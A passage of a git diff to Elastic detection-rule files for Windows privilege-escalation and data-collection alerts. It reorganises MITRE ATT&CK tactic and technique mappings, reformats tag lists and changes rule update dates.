+[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml index beff616928a..cc5a3e44aa3 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -59,7 +59,19 @@ The ICMLuaUtil Elevated COM Interface is a Windows component that facilitates Us risk_score = 73 rule_id = "68d56fdc-7ffa-4419-8e95-81641bd6f845" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -73,36 +85,53 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml index b02c911f5c6..8763bfd5251 100644 --- a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic"] @@ -64,7 +64,22 @@ User Account Control (UAC) is a security feature in Windows that helps prevent u risk_score = 47 rule_id = "1dcc51f6-ba26-49e7-9ef4-2655abb2361e" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -86,36 +101,53 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml index 993c7e84c77..db0e8042ad4 100644 --- a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml +++ b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/01" [rule] author = ["Elastic"] @@ -92,46 +92,46 @@ file where host.os.type == "windows" and event.type : "change" and process.name [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml index 96e8ff9eab2..c9cd1c4a1bb 100644 --- a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml +++ b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [transform] [[transform.osquery]] @@ -144,36 +144,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml index 3edafaea26b..8752086e4ee 100644 --- a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml +++ b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [transform] [[transform.osquery]] @@ -134,46 +134,46 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml index 92ec3ed3c71..fa2fd7c192b 100644 --- a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -132,46 +132,46 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml index 1475fa06cf2..4a8e99f0049 100644 --- a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml +++ b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/05" [transform] [[transform.osquery]] @@ -109,7 +109,20 @@ references = [ risk_score = 47 rule_id = "35df0dd8-092d-4a83-88c1-5151a804f31b" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -149,18 +162,19 @@ process.parent.name != null and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" [[rule.threat.technique.subtechnique]] -id = "T1036.009" -name = "Break Process Trees" -reference = "https://attack.mitre.org/techniques/T1036/009/" +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml index a2222b42bc5..5205c3c67f0 100644 --- a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml +++ b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -110,26 +110,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_via_ppid_spoofing.toml b/rules/windows/privilege_escalation_via_ppid_spoofing.toml index 320714b320d..35699123c49 100644 --- a/rules/windows/privilege_escalation_via_ppid_spoofing.toml +++ b/rules/windows/privilege_escalation_via_ppid_spoofing.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/01" [rule] author = ["Elastic"] @@ -136,18 +136,24 @@ Parent Process ID (PPID) spoofing is a technique where adversaries manipulate th [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [[rule.threat.technique.subtechnique]] id = "T1134.004" name = "Parent PID Spoofing" reference = "https://attack.mitre.org/techniques/T1134/004/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml index bcceba7f00e..cb89a43db4b 100644 --- a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml +++ b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/13" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -93,18 +93,14 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_via_token_theft.toml b/rules/windows/privilege_escalation_via_token_theft.toml index 57d314c6ce0..d6c46d38039 100644 --- a/rules/windows/privilege_escalation_via_token_theft.toml +++ b/rules/windows/privilege_escalation_via_token_theft.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/07" [rule] author = ["Elastic"] @@ -22,7 +22,14 @@ references = [ risk_score = 73 rule_id = "02a23ee7-c8f8-4701-b99d-e9038ce313cb" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -142,36 +149,19 @@ In Windows environments, processes can be created with elevated tokens to perfor [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" - [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml index 906baeca97c..5bbc32c2c97 100644 --- a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml +++ b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/07" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -76,7 +76,14 @@ Audit Security System Extension (Success) ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -102,36 +109,19 @@ configuration where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules_building_block/collection_archive_data_zip_imageload.toml b/rules_building_block/collection_archive_data_zip_imageload.toml index 8b65f51a63a..445af055e36 100644 --- a/rules_building_block/collection_archive_data_zip_imageload.toml +++ b/rules_building_block/collection_archive_data_zip_imageload.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -56,18 +56,14 @@ library where host.os.type == "windows" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" -[[rule.threat.technique.subtechnique]] -id = "T1560.002" -name = "Archive via Library" -reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules_building_block/collection_common_compressed_archived_file.toml b/rules_building_block/collection_common_compressed_archived_file.toml index b67d9497997..5742ea8c024 100644 --- a/rules_building_block/collection_common_compressed_archived_file.toml +++ b/rules_building_block/collection_common_compressed_archived_file.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = "endpoint" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/09" [rule] author = ["Elastic"] @@ -76,13 +76,58 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" +[[rule.threat.technique.subtechnique]] +id = "T1074.001" +name = "Local Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/001/" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1132" +name = "Data Encoding" +reference = "https://attack.mitre.org/techniques/T1132/" +[[rule.threat.technique.subtechnique]] +id = "T1132.001" +name = "Standard Encoding" +reference = "https://attack.mitre.org/techniques/T1132/001/" + + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/collection_microsoft_purview_dlp_signal.toml b/rules_building_block/collection_microsoft_purview_dlp_signal.toml index b824d6ba8a3..bfc6b8ca0b3 100644 --- a/rules_building_block/collection_microsoft_purview_dlp_signal.toml +++ b/rules_building_block/collection_microsoft_purview_dlp_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -56,34 +56,13 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1114" -name = "Email Collection" -reference = "https://attack.mitre.org/techniques/T1114/" - -[[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml b/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml index ecf0303733a..20d080f5445 100644 --- a/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml +++ b/rules_building_block/collection_microsoft_purview_insider_risk_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -53,3 +53,24 @@ event.dataset:o365.audit and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules_building_block/collection_posh_compression.toml b/rules_building_block/collection_posh_compression.toml index 9ef72645996..621b225c547 100644 --- a/rules_building_block/collection_posh_compression.toml +++ b/rules_building_block/collection_posh_compression.toml @@ -3,7 